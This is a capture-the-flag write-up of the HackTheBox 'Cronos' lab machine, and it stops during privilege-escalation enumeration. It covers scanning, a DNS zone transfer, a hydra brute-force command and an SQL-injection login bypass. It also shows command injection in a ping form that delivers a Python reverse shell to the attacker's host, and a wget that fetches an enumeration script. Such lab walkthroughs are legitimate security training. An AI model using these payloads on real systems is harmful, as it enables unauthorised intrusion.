Thumbnail: gravatar

Cracking Cronos - 'Cronos' HTB Writeup

by on under writeups
32 minute read

Cracking Cronos - ‘Cronos’ HTB Writeup

 

Host Information

Hostname IP Address Operating System Difficulty Level
Cronos 10.10.10.13 Linux Medium

Cronos HTB Card

 


view all writeups here


 

Writeup Contents:


 

Initial Recon

Again, we start with our initial recon of the target system. We’ll use the same enumeration automation script we used on ‘Sunday’ & ‘Bounty’ - nmapAutomator. You can find and download the script here on Github.

Let’s run a full scan against the target:


root@kali:/writeups/HTB/cronos/enumeration# nmapautomator 10.10.10.13 all



Running a all scan on 10.10.10.13



Host is likely running Linux







---------------------Starting Nmap Quick Scan---------------------



Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:33 CST

Nmap scan report for 10.10.10.13

Host is up (0.035s latency).

Not shown: 997 filtered ports

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT   STATE SERVICE

22/tcp open  ssh

53/tcp open  domain

80/tcp open  http



Nmap done: 1 IP address (1 host up) scanned in 4.84 seconds







---------------------Starting Nmap Basic Scan---------------------



Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:33 CST

Nmap scan report for 10.10.10.13

Host is up (0.029s latency).



PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey: 

|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)

|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)

|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)

53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)

| dns-nsid: 

|_  bind.version: 9.10.3-P4-Ubuntu

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: Apache2 Ubuntu Default Page: It works

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 14.82 seconds







----------------------Starting Nmap UDP Scan----------------------

                                                                                                                                                                                            

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:34 CST

Nmap scan report for 10.10.10.13

Host is up (0.034s latency).

Not shown: 997 open|filtered ports, 2 closed ports

PORT   STATE SERVICE

53/udp open  domain



Nmap done: 1 IP address (1 host up) scanned in 5.02 seconds





Making a script scan on UDP ports: 53

                                                                                                                                                                                            

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:34 CST

/root/nmapAutomator/nmapAutomator.sh: line 164: 25558 Segmentation fault      $nmapType -sCVU --script vulners --script-args mincvss=7.0 -p$(echo "${udpPorts}") -oN nmap/UDP_"$1".nmap "$1"







---------------------Starting Nmap Full Scan----------------------

                                                                                                                                                                                            

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:34 CST

Initiating Parallel DNS resolution of 1 host. at 09:34

Completed Parallel DNS resolution of 1 host. at 09:34, 0.01s elapsed

Initiating SYN Stealth Scan at 09:34

Scanning 10.10.10.13 [65535 ports]

Discovered open port 80/tcp on 10.10.10.13

Discovered open port 22/tcp on 10.10.10.13

Discovered open port 53/tcp on 10.10.10.13

SYN Stealth Scan Timing: About 11.51% done; ETC: 09:38 (0:03:58 remaining)

SYN Stealth Scan Timing: About 22.94% done; ETC: 09:38 (0:03:25 remaining)

SYN Stealth Scan Timing: About 34.36% done; ETC: 09:38 (0:02:54 remaining)

SYN Stealth Scan Timing: About 45.79% done; ETC: 09:38 (0:02:23 remaining)

SYN Stealth Scan Timing: About 57.22% done; ETC: 09:38 (0:01:53 remaining)

SYN Stealth Scan Timing: About 68.64% done; ETC: 09:38 (0:01:23 remaining)

SYN Stealth Scan Timing: About 80.07% done; ETC: 09:38 (0:00:53 remaining)

Completed SYN Stealth Scan at 09:38, 262.70s elapsed (65535 total ports)

Nmap scan report for 10.10.10.13

Host is up (0.029s latency).

Not shown: 65532 filtered ports

PORT   STATE SERVICE

22/tcp open  ssh

53/tcp open  domain

80/tcp open  http



Read data files from: /usr/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 262.78 seconds

           Raw packets sent: 131270 (5.776MB) | Rcvd: 206 (9.064KB)





No new ports

                                                                                                                                                                                            







---------------------Starting Nmap Vulns Scan---------------------

                                                                                                                                                                                            

Running CVE scan on basic ports

                                                                                                                                                                                            

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:38 CST

/root/nmapAutomator/nmapAutomator.sh: line 226: 25630 Segmentation fault      $nmapType -sV --script vulners --script-args mincvss=7.0 -p$(echo "${ports}") -oN nmap/CVEs_"$1".nmap "$1"





Running Vuln scan on basic ports

                                                                                                                                                                                            

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:38 CST

Nmap scan report for 10.10.10.13

Host is up (0.029s latency).



PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

|_http-csrf: Couldn't find any CSRF vulnerabilities.

|_http-dombased-xss: Couldn't find any DOM based XSS.

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

| vulners: 

|   cpe:/a:apache:http_server:2.4.18: 

|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679

|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668

|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169

|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167

|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211

|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312

|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715

|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082

|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788

|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217

|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098

|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220

|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196

|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199

|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333

|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798

|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710

|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743

|       CVE-2016-8740   5.0     https://vulners.com/cve/CVE-2016-8740

|       CVE-2016-4979   5.0     https://vulners.com/cve/CVE-2016-4979

|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197

|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092

|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763

|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975

|       CVE-2016-1546   4.3     https://vulners.com/cve/CVE-2016-1546

|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283

|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 328.27 seconds







---------------------Recon Recommendations----------------------

                                                                                                                                                                                            



Web Servers Recon:

                                                                                                                                                                                            

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.13:80 -o recon/gobuster_10.10.10.13_80.txt

nikto -host 10.10.10.13:80 | tee recon/nikto_10.10.10.13_80.txt





DNS Recon:

                                                                                                                                                                                            

host -l 10.10.10.13 10.10.10.13 | tee recon/hostname_10.10.10.13.txt

dnsrecon -r 10.10.10.0/24 -n 10.10.10.13 | tee recon/dnsrecon_10.10.10.13.txt

dnsrecon -r 127.0.0.0/24 -n 10.10.10.13 | tee recon/dnsrecon-local_10.10.10.13.txt











Which commands would you like to run?                                                                                                                                                       

All (Default), dnsrecon, gobuster, host, nikto, Skip <!>



Running Default in (1) s:  







---------------------Running Recon Commands----------------------

                                                                                                                                                                                            



Starting gobuster scan

                                                                                                                                                                                            

===============================================================

Gobuster v3.0.1

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)

===============================================================

[+] Url:            http://10.10.10.13:80

[+] Threads:        30

[+] Wordlist:       /usr/share/wordlists/dirb/common.txt

[+] Status codes:   200,204,301,302,307,401,403

[+] User Agent:     gobuster/3.0.1

[+] Show length:    true

[+] Extensions:     html,php

[+] Expanded:       true

[+] Timeout:        10s

===============================================================

2020/01/28 09:44:38 Starting gobuster

===============================================================

http://10.10.10.13:80/.hta (Status: 403) [Size: 290]

http://10.10.10.13:80/.hta.html (Status: 403) [Size: 295]

http://10.10.10.13:80/.hta.php (Status: 403) [Size: 294]

http://10.10.10.13:80/.htpasswd (Status: 403) [Size: 295]

http://10.10.10.13:80/.htpasswd.html (Status: 403) [Size: 300]

http://10.10.10.13:80/.htaccess (Status: 403) [Size: 295]

http://10.10.10.13:80/.htpasswd.php (Status: 403) [Size: 299]

http://10.10.10.13:80/.htaccess.html (Status: 403) [Size: 300]

http://10.10.10.13:80/.htaccess.php (Status: 403) [Size: 299]

http://10.10.10.13:80/index.html (Status: 200) [Size: 12454]

http://10.10.10.13:80/index.html (Status: 200) [Size: 12454]

http://10.10.10.13:80/server-status (Status: 403) [Size: 299]

===============================================================

2020/01/28 09:45:06 Finished

===============================================================



Finished gobuster scan

=========================

                                                                                                                                                                                            

Starting nikto scan

                                                                                                                                                                                            

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          10.10.10.13

+ Target Hostname:    10.10.10.13

+ Target Port:        80

+ Start Time:         2020-01-28 09:45:06 (GMT-6)

---------------------------------------------------------------------------

+ Server: Apache/2.4.18 (Ubuntu)

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.

+ Server may leak inodes via ETags, header found with file /, inode: 30a6, size: 555402443a52b, mtime: gzip

+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 

+ OSVDB-3233: /icons/README: Apache default file found.

+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host

+ End Time:           2020-01-28 09:50:20 (GMT-6) (314 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested



Finished nikto scan

                                                                                                                                                                                            

=========================

                                                                                                                                                                                            

Starting host scan

                                                                                                                                                                                            

Using domain server:

Name: 10.10.10.13

Address: 10.10.10.13#53

Aliases: 



13.10.10.10.in-addr.arpa domain name pointer ns1.cronos.htb.



Finished host scan

                                                                                                                                                                                            

=========================

                                                                                                                                                                                            

Starting dnsrecon scan

                                                                                                                                                                                            

Traceback (most recent call last):

  File "./dnsrecon.py", line 1788, in <module>

    main()

  File "./dnsrecon.py", line 1522, in main

    if check_nxdomain_hijack(entry):

  File "./dnsrecon.py", line 292, in check_nxdomain_hijack

    answers = res.query(test_name, record_type, tcp=True)

  File "/usr/lib/python2.7/dist-packages/dns/resolver.py", line 898, in query

    raise NoNameservers(request=request, errors=errors)

dns.resolver.NoNameservers: All nameservers failed to answer the query 9dDF520fb03c84796C61.com. IN A: Server 10.10.10.13 TCP port 53 answered The DNS operation timed out.; Server 10.10.10.13 TCP port 53 answered SERVFAIL



Finished dnsrecon scan

                                                                                                                                                                                            

=========================

                                                                                                                                                                                            

Starting dnsrecon scan

                                                                                                                                                                                            

Traceback (most recent call last):

  File "./dnsrecon.py", line 1788, in <module>

    main()

  File "./dnsrecon.py", line 1522, in main

    if check_nxdomain_hijack(entry):

  File "./dnsrecon.py", line 292, in check_nxdomain_hijack

    answers = res.query(test_name, record_type, tcp=True)

  File "/usr/lib/python2.7/dist-packages/dns/resolver.py", line 898, in query

    raise NoNameservers(request=request, errors=errors)

dns.resolver.NoNameservers: All nameservers failed to answer the query 8A9b46103f6ceCD4dF7E.com. IN A: Server 10.10.10.13 TCP port 53 answered The DNS operation timed out.; Server 10.10.10.13 TCP port 53 answered SERVFAIL



Finished dnsrecon scan

                                                                                                                                                                                            

=========================

                                                                                                                                                                                            

                                                                                                                                                                                            

                                                                                                                                                                                            

---------------------Finished all Nmap scans---------------------                                                                                                                           

                                                                                                                                                                                            



Completed in 16 minute(s) and 57 second(s)




root@kali:/writeups/HTB/cronos/enumeration# nmap -O -osscan-guess 10.10.10.13

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 10:34 CST

Nmap scan report for 10.10.10.13

Host is up (0.030s latency).

Not shown: 997 filtered ports

PORT   STATE SERVICE

22/tcp open  ssh

53/tcp open  domain

80/tcp open  http

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Aggressive OS guesses: Linux 3.2 - 4.9 (92%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%)                                                                                                                                                 

No exact OS matches for host (test conditions non-ideal).                                                                                                                                   

                                                                                                                                                                                            

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 9.28 seconds

OK, so we have HTTP and SSH open on their default ports, as well as DNS. What sticks out to me, however, is that DNS appears to be running from TCP, as opposed to the usual UDP. Both are obviously valid, but it’s almsot certain the norm is being deviated from for a reason. We’ll keep that in mind as we go along. This is also a Linux server, which we already knew, probably some version of kernel 3 or 4. Looking at the HTTP information, we see the following: httpd 2.4.18 ((Ubuntu)). A quick Google shows that the particular httpd version is likely associated with Ubuntu Xenial.

 

Checking out HTTP and DNS

Let’s begin by looking at the content served by HTTP.

On the main landing page, seems we get the Apache2 Ubuntu default page, so perhaps that hints at a misconfiguration we could leverage. Looks like all the pages but the index returned a 403 forbidden status

Let’s take a look at DNS, to see if we can leverage something there to gain access to some of those forbidden files, or potentially provide another foothold.

 

The fact that DNS is running over TCP still sticks out to me - let’s see if we can run a DNS Zone Transfer, and get more information. A DNS Zone transfer is simply copying part of the DNS config information (a zone) from the host (in this case cronos) to a remote system. Essentially the remote/attacker system simply acts as a secondary DNS server under the primary (Cronos), and asks for a copy of the DNS zone records. This is not a very uncommon or complicated process, as this functionality is often how multiple DNS servers work, one primary and one or more secondaries, however, the ability to act as a secondary DNS server and obtain records without any kind of integrity/authenticity checking is technically a vulnerability and is what makes DNS Zone Transfers often considered an attack if done by an unintended server.

In order to do this, however, we need to know the domain name of the 10.10.10.13 system. Looking at the nslookup man page, you can specify a host to lookup the DNS address for, isntead of using nslookup’s default. As the box is on a private address space and itself is acting as the DNS server, we’ll want to use this option, and specify the box itself as the NS source:


root@kali:/writeups/HTB/cronos/enumeration# nslookup 10.10.10.13 10.10.10.13

13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.

So ns1 is probably the primary name server, meaning our overal domain name is likely cronos.htb. Let’s go ahead and add cronos.htb to our /etc/hosts, and see if we can ping the host and resolve to 10.10.10.13. If so, we should be correct and read to move on to the DNS zone transfer.

Once added to our hosts, we can confirm resolution:


root@kali:/writeups/HTB/cronos/enumeration# ping -c3 cronos.htb

PING cronos.htb (10.10.10.13) 56(84) bytes of data.

64 bytes from cronos.htb (10.10.10.13): icmp_seq=1 ttl=63 time=29.0 ms

64 bytes from cronos.htb (10.10.10.13): icmp_seq=2 ttl=63 time=29.8 ms

64 bytes from cronos.htb (10.10.10.13): icmp_seq=3 ttl=63 time=30.5 ms



--- cronos.htb ping statistics ---

3 packets transmitted, 3 received, 0% packet loss, time 2005ms

rtt min/avg/max/mdev = 29.021/29.761/30.465/0.590 ms

Interestingly enough, we notice if we go back to the website, and use the domain name that’s now added to our hosts file, the site seems to display properly. So the setup was likely a misconfiguration in either the apache or DNS config.

Properly Resolved Cronos Site

Quickly checking the site, however, doesn’t reveal anything useful. The links on the page are all to exteranl sites, which are out of the scope of this engagement, and nothing appears useful in the page source.

 

DNS Zone transfer

Let’s move on to do our Zone Transfer.

We can perform the zone transfer with the following dig command:

dig axfr @10.10.10.13 cronos.htb


; <<>> DiG 9.11.14-3-Debian <<>> axfr @10.10.10.13 cronos.htb

; (1 server found)

;; global options: +cmd

cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800

cronos.htb.             604800  IN      NS      ns1.cronos.htb.

cronos.htb.             604800  IN      A       10.10.10.13

admin.cronos.htb.       604800  IN      A       10.10.10.13

ns1.cronos.htb.         604800  IN      A       10.10.10.13

www.cronos.htb.         604800  IN      A       10.10.10.13

cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800

;; Query time: 29 msec

;; SERVER: 10.10.10.13#53(10.10.10.13)

;; WHEN: Tue Jan 28 12:05:16 CST 2020

;; XFR size: 7 records (messages 1, bytes 203)



From here we can see further subdomains that are tied to the cronos system. Let’s go ahead and add these to /etc/hosts as well:

 

checking the site after zone transfer


root@kali:/writeups/HTB/cronos/enumeration# cat /etc/hosts | grep cronos

10.10.10.13     cronos.htb ns1.cronos.htb admin.cronos.htb www.cronos.htb

Now let’s check out the website again after adding the additional information to the hosts file. As expected, the www prefix redirects to the main cronos.htb site. the ns1 prefix leads us back to the Ubuntu apache config page, which makes sense. That leaves the admin prefix, which is the most interesting anyway.

Looks like we’re presented with an admin login portal, with username and password fields.

 

gaining access to the admin portal

The page source doesn’t give any clues to the logoin credentials, so let’s try a few defaults first. Trying a few variants of admin/administrator and cronos didn’t seem to yield any results. Let’s give hydra a shot:

First we need to see what kind of HTTP request the page is sending when we submit the login page, and what the username and password fields are. We can do this in either Burp or FireFox/Chrome Developer tools, I’ll use Firefox. I cover this in more detail in anther writeup, but you can Right-Click the page > Inspect Element > Go to the Network tab > Type in data for the login fields > Hit Submit.

From there you should be able to see the HTTP request type, as well as the names of the fields in “Params” tab on the right.

In this case the fields are simply “username” and “password”, and the HTTP method is POST, as shown in the below screenshot. We also see the text “Login Name or Password is invalid,” which we’ll need to pass on to hydra.

Cronos admin page info

I quickly made a small list of users, combining what I thought would be likely candidates, along with entries from /usr/share/wordlists/metasploit/http_default_users.txt


oot@kali:/writeups/HTB/cronos/enumeration# cat users.txt 

admin

administrator

cronos

Cronos

laravel

root

htb

HTB

HackTheBox

hackthebox

manager

cisco

apc

pass

security

user

system

sys

wampp

newuser

xampp-dav-unsecure

Now let’s build our hydra comamnd:


hydra -s 80 -V -L users.txt -P /usr/share/wordlists/rockyou.txt admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^&:invalid"

That’s goign to take awhile to run, so while that’s running, let’s try to manually test to see if the login page is vulnerable to SQL injection at all. Normally I’d want to through SQLmap at the page, but since you can’t use that in OSCP, let’s try some manual testing.

After a few minutes messing around with some basic permutations of some manual SQL injection tests, [you can find some exmaples/explanations here][https://www.veracode.com/security/sql-injection]

, we find that the following works:


username: 

admin ' -- -



password:

[blank]

Fortunately, we can go ahead and kill our hydra run, then.

This brings us to http://admin.cronos.htb/welcome.php, which has an apparent network testing functionality, with both ping and traceroute options:

Net Tool on Cronos Admin Page

 

initial foothold

 

leveraging the Net Tool page for an initial foothold

Let’s go ahead and play with the net tool for a minute and see how it behaves.

On pigng, for example, we can see that it sends a POST request, and the following command is viewable (from Firefox’s Inspect Elements > Network > Params option): ping+-c+1. One of the first things I always want to check on a text box or input field is if there’s any user input sanitization. So let’s test this out and see if we can get any command execution, or at least some more information to go off of.

In Linux, the semicolon (;) denotes two separate commands on a single line, one run after the other. (command1 && command2 is similar, but would run command2 only if command1 completed with an exit status of 0 (usually success.)) Let’s attempt to run an arbitrary command after the initial ping, so tht the following is in the text box: 8.8.8.8; whaomi.

We see when we do this, after hitting “Execute!” the following is displayed under the field:


 www-data

Great, so we know we can get some command execution. Let’s try to start a netcat listener, and then spawn a bash shell to that port.

Start a listener locally with nc -lvnp 4444, and then we can use this handy reference to build our shell command. We can tell by running the “which python” command in the Net Tool textbox, that python is installed, so let’s go ahead and try to spawn our shell with that, as it is often seemingly more stable. So we come up with the following for the Net Tool input box:


8.8.8.8; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<VPN IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We get no response from the net tool webpage, but if we look at our listener, we got a shell!


root@kali:/writeups/HTB/cronos/enumeration# nc -lvnp 4444

listening on [any] 4444 ...

connect to [10.10.14.50] from (UNKNOWN) [10.10.10.13] 56198

/bin/sh: 0: can't access tty; job control turned off

$ whoami

www-data

$ pwd

/var/www/admin

$ 

Let’s go ahead and grab the user flag, then enumerate from our new perspective, to see how we can privesc.


$ whoami

www-data

$ pwd

/var/www/admin

$ find / -name user.txt 2>/dev/null

/home/noulis/user.txt

$ cat /home/noulis/user.txt

{feed me hashes =^_^=}

$ 

 

Privilege Escalation

 

further enumeration for PrivEsc

Let’s begin doing some further digging to see what’s running and how we can protentially escalate prvileges:


$ uname -a

Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Searching for world-writeable files, we find:


$ find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \; 2>/dev/null

drwxrwxrwt 2 root root 40 Jan 28 06:19 /dev/mqueue

drwxrwxrwt 2 root root 40 Jan 28 06:19 /dev/shm

drwxrwxr-x 2 root utmp 40 Jan 28 06:19 /run/screen

drwxrwxr-x 2 root bind 80 Jan 28 06:22 /run/named

drwxrwxrwt 5 root root 100 Jan 28 06:22 /run/lock

drwxrwxrwt 9 root root 4096 Jan 28 22:37 /tmp

drwxrwxrwt 2 root root 4096 Jan 28 06:19 /tmp/.XIM-unix

drwxrwxrwt 2 root root 4096 Jan 28 06:19 /tmp/.ICE-unix

drwxrwxrwt 2 root root 4096 Jan 28 06:19 /tmp/.Test-unix

drwxrwxrwt 2 root root 4096 Jan 28 06:19 /tmp/.font-unix

drwxrwxrwt 2 root root 4096 Jan 28 06:19 /tmp/.X11-unix

drwxrwxr-x 10 root syslog 4096 Jan 28 06:25 /var/log

drwxrwsr-x 2 root mail 4096 Feb 15  2017 /var/mail

drwxrwxrwt 2 root root 4096 Mar 22  2017 /var/crash

drwxrwx--T 2 daemon daemon 4096 Jan 15  2016 /var/spool/cron/atspool

drwxrwx--T 2 daemon daemon 4096 Mar 22  2017 /var/spool/cron/atjobs

drwx-wx--T 2 root crontab 4096 Apr  9  2017 /var/spool/cron/crontabs

drwxrwxr-x 2 root bind 4096 Apr  9  2017 /var/lib/bind

drwx-wx-wt 2 root root 7180288 Jan 28 22:09 /var/lib/php/sessions

drwxrwxrwt 3 root root 4096 Jan 28 06:19 /var/tmp

drwxrwsr-x 2 root staff 4096 Apr 12  2016 /var/local

drwxrwxr-x 2 root bind 4096 Jan 28 22:25 /var/cache/bind

drwxrwsr-x 3 root staff 4096 Mar 22  2017 /usr/local/lib/python3.5

drwxrwsr-x 2 root staff 4096 Feb 15  2017 /usr/local/lib/python3.5/dist-packages

drwxrwsr-x 4 root staff 4096 Apr  9  2017 /usr/local/lib/python2.7

drwxrwsr-x 2 root staff 4096 Apr  9  2017 /usr/local/lib/python2.7/dist-packages

drwxrwsr-x 2 root staff 4096 Apr  9  2017 /usr/local/lib/python2.7/site-packages

drwxrwsr-x 2 root staff 4096 Apr  9  2017 /usr/local/share/fonts

drwxrwsr-x 6 root staff 4096 Mar 22  2017 /usr/local/share/xml

drwxrwsr-x 2 root staff 4096 Mar 22  2017 /usr/local/share/xml/declaration

drwxrwsr-x 2 root staff 4096 Mar 22  2017 /usr/local/share/xml/entities

drwxrwsr-x 2 root staff 4096 Mar 22  2017 /usr/local/share/xml/misc

drwxrwsr-x 2 root staff 4096 Mar 22  2017 /usr/local/share/xml/schema

drwxrwsr-x 7 root staff 4096 Mar 22  2017 /usr/local/share/sgml

drwxrwsr-x 2 root staff 4096 Mar 22  2017 /usr/local/share/sgml/declaration

drwxrwsr-x 2 root staff 4096 Mar 22  2017 /usr/local/share/sgml/entities

drwxrwsr-x 2 root staff 4096 Mar 22  2017 /usr/local/share/sgml/misc

drwxrwsr-x 2 root staff 4096 Mar 22  2017 /usr/local/share/sgml/dtd

drwxrwsr-x 2 root staff 4096 Mar 22  2017 /usr/local/share/sgml/stylesheet

drwxrwxr-x 5 root root 4096 Mar 22  2017 /usr/share/man/es

drwxrwxr-x 2 root root 4096 Mar 22  2017 /usr/share/man/es/man1

drwxrwxr-x 5 root root 4096 Mar 22  2017 /usr/share/man/fr

drwxrwxr-x 2 root root 4096 Mar 22  2017 /usr/share/man/fr/man1

drwxrwxr-x 5 root root 4096 Mar 22  2017 /usr/share/man/ja

drwxrwxr-x 2 root root 4096 Mar 22  2017 /usr/share/man/ja/man1

drwxrwxr-x 5 root root 4096 Mar 22  2017 /usr/share/man/de

drwxrwxr-x 2 root root 4096 Mar 22  2017 /usr/share/man/de/man1

drwxrwxr-x 5 root root 4096 Mar 22  2017 /usr/share/man/it

drwxrwxr-x 2 root root 4096 Mar 22  2017 /usr/share/man/it/man1

drwxrwxr-x 5 root root 4096 Mar 22  2017 /usr/share/man/pl

drwxrwxr-x 2 root root 4096 Mar 22  2017 /usr/share/man/pl/man1

Nothing seemingly too crazy, /var/lib/bind apparently relates to DNS, so that could be a potential path to go down. Before we get too far, though, let’s run a script to do some auto enumeration for privesc. We’ll try a shell script called linux-smart-enumeration.

Let’s serve the directory with the script over simpleHTTP locally, then transfer it to the target system:


root@kali:/recon/linux-smart-enumeration# python -m SimpleHTTPServer 8080

Serving HTTP on 0.0.0.0 port 8080 ...



and from the target system, let’s grab the file locally.


$ which wget

/usr/bin/wget

$ wget http://10.10.14.50:8080/lse.sh

--2020-01-28 22:45:14--  http://10.10.14.50:8080/lse.sh

Connecting to 10.10.14.50:8080... connected.

HTTP request sent, awaiting response... 200 OK

Length: 34316 (34K) [text/x-sh]

Saving to: 'lse.sh'



     0K .......... .......... .......... ...                  100%  532K=0.06s



2020-01-28 22:45:14 (532 KB/s) - 'lse.sh' saved [34316/34316]



Now let’s run it:


$ chmod +x lse.sh



$ ./lse.sh

---

If you know the current user password, write it here for better results:                                        

---

                                                                                                                

 LSE Version: 1.16                                                                                              



        User: www-data

     User ID: 33

    Password: none

        Home: /var/www

        Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

       umask: 0022



    Hostname: cronos

       Linux: 4.4.0-72-generic

Distribution: Ubuntu 16.04.2 LTS

Architecture: x86_64



==================================================================( users )=====

[i] usr000 Current user groups............................................. yes!

[*] usr010 Is current user in an administrative group?..................... nope

[*] usr020 Are there other users in an administrative groups?.............. yes!

[*] usr030 Other users with shell.......................................... yes!

[i] usr040 Environment information......................................... skip

[i] usr050 Groups for other users.......................................... skip                                

[i] usr060 Other users..................................................... skip                                

[*] usr070 PATH variables defined inside /etc.............................. yes!                                

[!] usr080 Is '.' in a PATH variable defined inside /etc?.................. nope

===================================================================( sudo )=====

[!] sud000 Can we sudo without a password?................................. nope

[!] sud010 Can we list sudo commands without a password?................... nope

[*] sud040 Can we read /etc/sudoers?....................................... nope

[*] sud050 Do we know if any other users used sudo?........................ yes!

============================================================( file system )=====

[*] fst000 Writable files outside user's home.............................. yes!

[*] fst010 Binaries with setuid bit........................................ yes!

[!] fst020 Uncommon setuid binaries........................................ nope

[!] fst030 Can we write to any setuid binary?.............................. nope

[*] fst040 Binaries with setgid bit........................................ skip

[!] fst050 Uncommon setgid binaries........................................ skip                                

[!] fst060 Can we write to any setgid binary?.............................. skip                                

[*] fst070 Can we read /root?.............................................. nope                                

[*] fst080 Can we read subdirectories under /home?......................... yes!

[*] fst090 SSH files in home directories................................... nope

[*] fst100 Useful binaries................................................. yes!

[*] fst110 Other interesting files in home directories..................... nope

[!] fst120 Are there any credentials in fstab/mtab?........................ nope

[*] fst130 Does 'www-data' have mail?...................................... nope

[!] fst140 Can we access other users mail?................................. nope

[*] fst150 Looking for GIT/SVN repositories................................ yes!

[!] fst160 Can we write to critical files?................................. nope

[!] fst170 Can we write to critical directories?........................... nope

[!] fst180 Can we write to directories from PATH defined in /etc?.......... nope

[i] fst500 Files owned by user 'www-data'.................................. skip

[i] fst510 SSH files anywhere.............................................. skip                                

[i] fst520 Check hosts.equiv file and its contents......................... skip                                

[i] fst530 List NFS server shares.......................................... skip                                

[i] fst540 Dump fstab file................................................. skip                                

=================================================================( system )=====                                

[i] sys000 Who is logged in................................................ skip

[i] sys010 Last logged in users............................................ skip                                

[!] sys020 Does the /etc/passwd have hashes?............................... nope                                

